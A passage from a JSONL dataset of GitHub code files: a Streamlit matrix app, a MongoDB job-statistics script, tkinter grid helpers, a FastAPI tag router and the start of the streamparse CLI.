final_matrix = np.concatenate(final_matrix, axis=1)\n final_matrix = final_matrix[:number_row_m1, :number_column_m2]\n st.text(str(final_matrix))\n\n st.text(\"Execution time : \")\n st.text(str((time.time() - time_2)))\n\nif st.button('Start'):\n runComputation()\n","repo_name":"anthopit/Matrices_Multiplication_CloudApp","sub_path":"script/appStreamLit.py","file_name":"appStreamLit.py","file_ext":"py","file_size_in_byte":9361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26151968768","text":"import json\r\nimport pymongo\r\nimport time\r\n\r\n\r\nclass Record:\r\n def __init__(self, subcategory, avg_income, views_td, views_all):\r\n self.subcategory = subcategory\r\n self.avg_income = avg_income\r\n self.views_td = views_td\r\n self.views_all = views_all\r\n self.last_updated = time.ctime(time.time())\r\n\r\n\r\nclass DataToCalc:\r\n a = 0\r\n\r\n def __init__(self, subcategory, avg_income, views1, views2):\r\n self.subcategory = subcategory\r\n self.avg_income = avg_income\r\n self.views1 = views1\r\n self.views2 = views2\r\n self.a = 1\r\n\r\n def update(self, avg_income, v1, v2):\r\n self.avg_income += avg_income\r\n self.views1 += v1\r\n self.views2 += v2\r\n self.a += 1\r\n\r\n def calculate_avg(self):\r\n self.avg_income = round(self.avg_income / self.a)\r\n\r\n\r\ndef create_record(data):\r\n col2.insert_one(data)\r\n\r\n\r\ndef update_records(data):\r\n for i in data:\r\n query = {\"subcategory\": i[\"subcategory\"]}\r\n values = {\"$set\": {\"avg_income\": i[\"avg_income\"], \"views_td\": i[\"views_td\"],\r\n \"views_all\": i[\"views_all\"], \"last_updated\": i[\"last_updated\"]}}\r\n\r\n col2.update_one(query, values)\r\n\r\n\r\nclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\ndb = client[\"PBL\"]\r\ncol1 = db[\"Subcategories\"]\r\ncol2 = db[\"Main\"]\r\n\r\nfile = open('jobs.json')\r\ndata = json.load(file)\r\n\r\nrecords = []\r\nnums = []\r\ncategories = []\r\ncat = {}\r\nrec = {}\r\ni = 0\r\n\r\n\r\nfor i in data:\r\n t = 0\r\n\r\n for j in nums:\r\n if j.subcategory == i[\"subcategory\"]:\r\n t = 1\r\n break\r\n\r\n money = i[\"priceValue\"]\r\n\r\n if i[\"priceCurrency\"] != \"lei\":\r\n money = money * 19\r\n\r\n if t == 0:\r\n inc = DataToCalc(i[\"subcategory\"], money, i[\"viewsToday\"], i[\"viewsAll\"])\r\n nums.append(inc)\r\n\r\n elif t == 1:\r\n for j in nums:\r\n if j.subcategory == i[\"subcategory\"]:\r\n j.update(money, i[\"viewsToday\"], i[\"viewsAll\"])\r\n break\r\n\r\nx = col1.find()\r\n\r\nfor i in x:\r\n cat = {\"name\": i[\"name\"], \"id\": i[\"id\"]}\r\n categories.append(cat)\r\n\r\nfor j in nums:\r\n t = 0\r\n j.calculate_avg()\r\n\r\n for i in categories:\r\n if i[\"name\"] == j.subcategory:\r\n rec = Record(i[\"id\"], j.avg_income, j.views1, j.views2).__dict__\r\n\r\n x = col2.find()\r\n\r\n for i in x:\r\n if i[\"subcategory\"] == rec[\"subcategory\"]:\r\n records.append(rec)\r\n t = 1\r\n break\r\n\r\n if t == 0:\r\n create_record(rec)\r\n\r\nupdate_records(records)\r\n","repo_name":"prenaissance/sem2pbl2022","sub_path":"db/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24238270528","text":"import tkinter.ttk as ttk\nimport tkinter as tk\n\n\ndef build_components(parent):\n \"\"\"docstring\"\"\"\n\n components = {}\n\n header = ttk.Frame(parent)\n header.grid(row=0, column=0, columnspan=3, pady=10, sticky='')\n components['header'] = header\n\n left = ttk.Frame(parent)\n left.grid(row=1, column=0, padx=10, sticky='')\n components['left'] = left\n mid = ttk.Frame(parent)\n mid.grid(row=1, column=1, padx=10, sticky='')\n components['mid'] = mid\n right = ttk.Frame(parent)\n right.grid(row=1, column=2, padx=10, sticky='')\n components['right'] = right\n\n footer = ttk.Frame(parent)\n footer.grid(row=2, column=0, columnspan=3, pady=10, sticky='')\n components['footer'] = footer\n\n center(parent)\n return components \n\ndef center(parent):\n rows, columns = parent.grid_size()\n for i in range(columns):\n parent.grid_columnconfigure(i, weight=1) \n for i in range(rows):\n parent.grid_rowconfigure(i, weight=1) \n\n\ndef vgrid(parent, depth=1, **kwargs):\n for i, widget in enumerate(parent.winfo_children()):\n widget.grid(row=i // depth, column=i % depth, sticky='', **kwargs)\n center(parent)\n\n\ndef hgrid(parent, depth=1, **kwargs):\n for i, widget in enumerate(parent.winfo_children()):\n widget.grid(row=i % depth, column=i // depth, sticky='', **kwargs)\n center(parent)\n\n\ndef display(entry, value=\"\"):\n \"\"\"delete entry contents and insert value\"\"\"\n\n entry.delete(0, \"end\")\n entry.insert(0, value)\n\n","repo_name":"mhyatt000/AR4","sub_path":"general/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36053022181","text":"import funcy\nfrom databases.interfaces import Record\nfrom fastapi import APIRouter, status\nfrom sqlalchemy import select\n\nfrom api.exceptions import NotFound\nfrom app.database import database\nfrom models import Tag\nfrom schemas.tags import CreateTagRequest, TagResponse, UpdateTagRequest\nfrom services.exceptions import DoesNotExist\nfrom services.tags import create_one_tag, delete_one_tag, get_one_tag, update_one_tag\n\nrouter = APIRouter()\n\n\n@router.get('/tags/', tags=['tasks'], response_model=list[TagResponse])\nasync def read_tags_list() -> list[Record]:\n query = select(Tag)\n tags = await database.fetch_all(query)\n return tags\n\n\n@router.get('/tags/{pk}/', tags=['tasks'], response_model=TagResponse)\nasync def read_tag(pk: int) -> Record:\n with funcy.reraise(DoesNotExist, NotFound(f'tag with pk={pk} not found')):\n tag: Record = await get_one_tag(pk=pk)\n return tag\n\n\n@router.post(\n '/tags/',\n tags=['tasks'],\n response_model=TagResponse,\n status_code=status.HTTP_201_CREATED,\n)\nasync def create_tag(request: CreateTagRequest) -> Record:\n tag: Record = await create_one_tag(data=request.dict())\n return tag\n\n\n@router.put('/tags/{pk}/', tags=['tasks'], response_model=TagResponse)\nasync def update_tag(pk: int, request: UpdateTagRequest) -> Record:\n update_data = request.dict(exclude_unset=True)\n\n with funcy.reraise(DoesNotExist, NotFound(f'tag with pk={pk} not found')):\n tag: Record = await update_one_tag(pk=pk, data=update_data)\n\n return tag\n\n\n@router.delete('/tags/{pk}/', tags=['tasks'], status_code=status.HTTP_204_NO_CONTENT)\nasync def delete_tag(pk: int) -> None:\n with funcy.reraise(DoesNotExist, NotFound(f'tag with pk={pk} not found')):\n await delete_one_tag(pk=pk)\n","repo_name":"korostil/todo","sub_path":"backend/api/private/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38207230665","text":"from docopt import docopt\n\nfrom ext.fabric import *\nfrom ext.invoke import *\nfrom bootstrap import quickstart\n\n\n# XXX: these are commands we're working on still\nTODO_CMDS = \"\"\"\n sparse debug [-e ]\n sparse restart [-e ]\n sparse attach [-e ]\n sparse logs [-e ]\n\"\"\"\n\n\ndef main():\n \"\"\"sparse: manage streamparse clusters.\n\n sparse provides a front-end to streamparse, a framework for creating Python\n projects for running, debugging, and submitting computation topologies\n against real-time streams, using Apache Storm.\n\n It requires the java and lein (Clojure build tool) to be on your $PATH, and\n uses lein and Clojure under the hood for JVM/Thrift interop.\n\n Usage:\n sparse quickstart \n sparse run [-n ] [-t